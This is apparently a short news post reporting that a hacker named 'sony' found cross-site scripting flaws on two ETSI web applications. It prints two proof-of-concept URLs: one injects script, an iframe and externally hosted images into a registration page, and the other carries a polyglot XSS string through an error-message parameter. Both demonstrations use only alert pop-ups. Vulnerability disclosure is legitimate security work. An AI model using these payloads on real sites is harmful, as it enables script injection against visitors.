XSS vulnerability in European Telecommunications StandardsInstitute ( ETSI ) website
Hacker "sony" discovered a cross site scripting vulnerability in European Telecommunications StandardsInstitute ( ETSI ) website. In the past, he found xss vulnerabilities in lot of high profile sites including toshiba official site, Berkeley university and more.
To tell about the ETSI , is an independent, non-profit, standardization
organization in the telecommunications industry (equipment makers and network operators) in Europe , with worldwide projection.
The website has xss vulnerability in two different locations .
Poc:
http://webapp.etsi.org/3GPPRegistration/fUnRegister.asp?qMeeting=29942&qUsername=%22%3E%3Cbody%20background=%22http://www.lenagold.ru/fon/geom/shar/raz/razshar115.jpg%22%3E%3Cscript%3Ealert%28%22ETSI%20XSS%20by%20Sony%20http://st2tea.blogspot.com%22%29%3C/script%3E%3Ciframe%20width=%22540%22%20height=%22450%22%20src=%22http://www.youtube.com/embed/34C41eEpM48%22%20frameborder=%220%22%20allowfullscreen%3E%3C/iframe%3E%3Cimg%20src=http://www.lenagold.ru/fon/clipart/k/kot/kosh395.gif%20align=center%3E
http://etsi-eshop.etsi.org/ecommerce/include/ProcessError.asp?ErrNb=-2147217887&Message=ODBC+driver+does+not+support+the+requested+properties.%3Cbr%3E%28Select+*+From+Customer+Where+EMAIL%3D%27%27%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E
He exposed this vulnerability in his own blog.